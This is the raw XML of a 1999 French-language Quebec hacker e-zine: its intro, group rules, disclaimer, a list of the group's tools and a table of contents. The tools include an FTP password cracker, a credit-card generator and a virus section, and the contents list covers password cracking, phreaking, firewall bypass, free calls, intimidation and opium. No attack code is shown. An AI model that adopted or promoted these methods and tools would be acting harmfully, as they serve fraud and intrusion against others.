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________                  __                 __           __________</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="24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QQQQQQQQ\          |HH|              |HH|     /AAAAAAAA\</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="24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QQ| ¯¯¯¯¯ |QQ|        |HH|              |HH|     |AA|¯¯¯¯¯¯|AA|</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="24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QQ|              |QQ|       |HH|______|HH|      |AA|______|AA|</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="24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QQ|            _|QQ|       |HHHHHHHHH|     |AAAAAAAAA|</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="24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QQ|        |QQQQ|       |HHHHHHHHH|     |AAAAAAAAA|</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="24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QQ|__   |QQQQ|        |HH|¯¯¯¯¯¯|HH|     |AA|¯¯¯¯¯¯ |AA|</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="24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QQQQQQQQQ\       |HH|              |HH|     |AA\             /AA|</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="24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 |QQQ|       |HH|              |HH|     |AAA|       |AAA|</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           ¯¯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rPr>
        <w:t>"We Are Everywhere"</w:t>
        <w:tab/>
        <w:tab/>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rPr>
        <w:t>- *******************************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rPr>
        <w:t>- *                           QHA                                *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rPr>
        <w:t>- *                        E-Zine #10                        *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rPr>
        <w:t>- *            http://www.qharulez.com            *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rPr>
        <w:t>- *                 dukest4r@hehe.co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rPr>
        <w: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Introduction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lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000080"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t xml:space="preserve">Nous avons ecrit les 9 autre E-zine en moins de 2 mois... donc on se dit qu'au lieu d'ecrire plusieurs e-zines moyennement remplis on a décidé d'en ecrire un gigantesque au moins cette fois-ci, et d'en faire un de 1 mb de text. Ce qui en fait le plus gros E-Zine francophone jamais produit... nous en feson votre cadeau de nowel ainsi que notre soulignement du nouveau millénium :) Ce E-zine a été sorti le 25 décembre 1999 Donc Bonne Lecture et bienvenu au </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>:</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00"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>Quebec Hacker's Alliance E-zine #10</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A propos des Quebec Hacker's Allianc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u w:val="single"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>Qui somme nous?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:lang w:val="en-CA"/>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QHA (Quebec Hackers Alliance) est une société, et comme dans toute société nous somme composé de gentil et de mauvais... nous avons un coté "legal" comme le web design et la radio etc etc... et d'autre coté plus illegal comme le hacking ,phreaking, anarchy etc...mais nous n'avons qu'un but: faire avancer notre organisation jusqu'au bout et pouvoir devenir un des plus gros centre de services informatique du net tout en restant benevoles... Nous somme des constructeur contrairement a certaine personne et a certain crew que l'ont nommera pas qui ne servent qu'a detruire ce que les autre construisent... Nous somme la pour faire avancé l'informatique et de pouvoir vous servir nos talen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ous sommes un organisme de jeunes et talentueux informaticiens Quebecois. Qui veulent donner de leur temps pour vous offrir tout ce qui peut s'offrir sur Internet comme services, ayant de de la qualité et avec un excellent support technique. Ceux qui ont ete accepté pour etre membres des QHA ne sont pas seulement des destructeurs de réseaux ni de station personnelle, comme notre drapeau semblerait le signifier. Non, nous sommes ici pour vous offrir des services gratuits tout en apprenant a maîtriser les metiers que nous avons chois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ous envisageons de créer, dans la mesure du possible, autant de sous-sections qu'il existe de talents. Notre but est de regrouper les jeunes du monde et de leur offrir une chance de démontrer leurs capacités.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En effet, nous sommes ici pour vous, et pour apprendre a mieux vous servir en utilisant ce que nous possédons à l'intérieur de nous-même: notre esprit et nos talents. Tout ce qu'il nous faut, c'est de l'expérience et la conviction que nous pouvons atteindre tout ce que nous voulons.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u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:u w:val="single"/>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u w:val="single"/>
        </w:rPr>
        <w:t>Alliance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>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ous fesont présentement parti de The Terrorist Circle une alliance comportant les Quebec Hacker's Alliance, les Hell Brigners Commandos et le groupe Bunker, avec but common de s'aider mutuellement pour tous nos projets de hack, nos e-zines, nos services qu'on offre et nos programmes qu'on construit, etc! Donc pour nous rejoindre ou pour plus de renseignement par rapport a l'alli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enez sur IRC/Undernet sur #qha, #hellbc ou #bunker</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>Notre mission:</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Nous nous donnons comme mission de devenir le plus gros centre de service internet tout en restant </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de pure benevole et de pouvoir offrir toute nos talents que nous possedons. Etant présentement le plus gros (parlant de nombre des membres) clan de Piratage informatique et de services internet du Quebec, a noté aussi que nous avons une équipe sur le terrain a laval qui n'est pas inscrit dans les membres (equipe d'anarchiste) nous avons décidé de crée le plus gros e-zine francophone jamais sorti de minimum 1mb... et voici ce que sa a donné :) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000080"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000080"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>Je considere les QHA vis-a-vis la scene Quebecoise un peu comme les Quebecois vis-a-vis les Us... Si tu regarde les Quebecois comme faut, nous somme une des plus grande nation au monde... on est un tres petit peuple par contre nous somme les meilleurs dans pratiquement toute les domaines, cours automobile, chanteuse, magicien, humoriste, sports, etc etc etc etc etc etc etc... et pourtant nous ne somme vraiment pas reconnu tant qu'sa au point de vu international... c'est ce que je veut dire... c'est comme les Quebecois... peu de nos grandioses realisations son reconnu, et peu de ce que l'on fait est reconnu... pourtant nous somme un des premier dans le hack du quebec... mais nous somme victimes des jaloux qui nous envient et qui parle toujours contre nous... nous nous fesont une mauvaise reputation a cause de ces gens... c'est de valeur... et c'est ainsi pour toute les domaines de la société... Je crois que les asti d'jaloux devrais maturer ou je sais pas koi mais changé, pcq s'est vraiment une mauvaise facon de se remonter en essayant de rabaissez les autres... et s'est qqc contre lequel nous ne pouvons lutter...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000080"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000080"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>Lois et reglements</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>:</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b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000080"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t xml:space="preserve">Si Dukester, président des Quebec Hacker's Alliance, s'absente pour plus de quatres jours, Inrage, vice-president des Quebec Hacker's Alliance, en prend automatiquement la releve par intérim, et pareillement pour Clad Strife, second vice-président des Quebec Hacker's Alliance. Si aucun de nous trois ne s'est présenté pour plus de une semaine bin la lache la mescaline! </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b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000080"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t xml:space="preserve">En tant que membres tu te dois de respecter les autres membres en evitant les importuns et *en bon Quebecois* en me sacrant patience avec les tite guerres interne! </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b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000080"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t xml:space="preserve">Si vous etes pas un QHA bin la c'est a tes risque de nous ecoeurer ou non... anyway d'une maniere ou d'une autre ecoeurer nous comme vous voulez on s'en sack! lol </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b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000080"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t xml:space="preserve">C'est pamal toute les reglement implenter pour le moment... </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>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b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:u w:val="single"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>Dislaimer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>:</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Tout ce que vous, trouverez, ou apprendrez ne sauraient en incriminer ceux qui ne peuvent etre les responsables de VOS actes. Vos actions ne regardent que vous, la loi fait en sorte que chacun assume ses actions. Donc si vous avez des problèmes de quelques ordres que ce soit, et qu'on en soit indirectement mis en cause, cela ne vient pas nous poser de torts car nous partons du principe qu'ayant lu ce discailmer vous acceptez toutes les conditions qui s'y appliques. En revanche si vous n'êtes pas d'accord, sil-vous-plait quitter ce E-zin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All what you can find, learn, you can use it..of course. But we are not responsables of your acts. We are oriented to help guys to secure themself. And the best way to it, it's to learn hacking. All what you find here is in a good intention to help internet to develop itself for a long time, to a good way. if you disagree with this terms, you can leave the site, if you make that is written, or execute that is at your disposition, it's your problem: YOUR ACTS, NOT OUR. You can leave the site if you disagree with these terms please leave this E-zine!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="fr-CA"/>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lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>Certaines réalisation des QHA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:lang w:val="en-CA"/>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pouvez maintenant allez chercher sur notre site web les programmes et outils suiv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QHA CrackFTP2: un programme pour cracker les password des site FTP, crée par Devilcul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CC# Generator: malheureusement il n'est concu que pour les membres et vous devez avoir le password pour y acced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QHA Crypter: L'encrypter et decrypter le plus rapide au monde! Crée par Sirius en Delph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QHA Winamp Skin: Un beau petit skin pour winam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Nos 10 E-zines sont aussi sur la page soit dans la section "Files" ou "E-zin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12 de nos meilleur articles sur l'anarchy!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Cogeco.mp3: un mp3 d'une appelle chialant contre CogecoCab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QHA Anti-Virus mais seulement pour les membres... désol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Le service d'sengne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Une section d'anarchy qui parle et donne des trucs sur l'anarch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Nos nombreux E-zines donc celui c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Service de WebDesig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Une section de production de Vir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Ainsi que BEACOUP d'autre programme, utilité et servic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xml:space="preserve">____    __  __    __           ____   __  __   __    ______ ____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__/ __ \_ / / / /__/   |      ___/ __ \_/ / / /_ / /___/ ____//_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xml:space="preserve">_  / / /_/ /_/ /__/ /| |      __/ /_/ /  / / /_ / / __/ /_   __/ /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_/ /_/ __  / _/ ___ |      _/ _, _// /_/ / _/ /___/ /___  _/ /__</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___\_\/_/ /_/  /_/  |_|      /_/ |_| \____/  /_____/_____/  /____/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:lang w:val="fr-CA"/>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La table des matière du E-Zine #1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0==((¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯))==0</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 xml:space="preserve">SOMMAIRE     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>|¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯|</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lang w:val="en-CA"/>
        </w:rPr>
        <w:t>Introduction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1 Les réseaux Internet-Hdynet, par Dead Luck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2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>Fun sous réseau NT 4.0, par Flameboy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3 Failles de securite,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4 Hades, Cracker Jack...: perçage de mots de passe pour les stations Unix,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5 Proxys: changer de proxy ou en mettre un ça sert à quoi?,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6 Quelques textes traduits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7 Le terminal X,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8 Dossier IRC,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9 Le SCSSI,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10 Discussion avec un lamer,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10.11 Comment reconnaitre un lamer, par Dukest4r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12 Comment avoir un cellulaire avec des minutes à l'infini?, par Fr0d </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserv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13 Comment se faire du petit change sans même travailler? par Fr0d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14 Comment faire chier un Prof que vous haïssez? par Fr0d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10.15 Comment se faire du $$$ avec une page web, par LordSoth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16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Introduction au Forgage, par LordSoth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17 Qbasic par Ripp£r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18 Une Technique pour faire des T/O (takeover) sur IRC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserv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19 Visual Basic par [Shad0w]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20 Phreaking par [Shad0w]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21 Password Cracking par : [Shad0w]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22 Page Hacking par [Shad0w]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23 Hacking Connection par [Shad0w]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24 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>Enlever le tit button démarrer, par [FlaMeBoY]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25 Quesque l'anarchi, d'apres LordSoth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26 Comment intimider quelqu'un, par LordSoth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27 Comment penetrer un systeme proteger par un firewall, par  TX[|}X]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28 Un article mixer sur plein de sujet, par ]SoulFly[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29 Quelques notion du cracking de password, par Dukest4r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30 Quelques Techniques sur le cracking en HEX, par Dukest4r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31 The Protector v.3.0, by TH[|}X]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32 Comment penetrer un system proteger par un firewall, par </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>TH[|}X]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserv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33 Takeover Rulez, par VolCoM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34 Comment s'en sortir dans les situation périlleuse,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35 Achats gratos,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36 Réseaux FT,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37 Termes des différents protocoles,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38 Comparatifs des capacités d'anti-virus(de mars 1999),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39 Quoi faire durant le temps des fete, par Dukest4r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40 Theorie sur la creation de programme chiant, par Hope_man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41  Opium et ses dérivé, par </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>T\\'ISTER</w:t>
      </w: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10.42  Comment se procurer un numero de carte pastel (carte fuck telecom ), par Par  .¤ViRuS¤.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserv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0.43  Comment telephoner Bankkksss®©™ a partir d''un sans fil sans avoir d'outdial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44 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
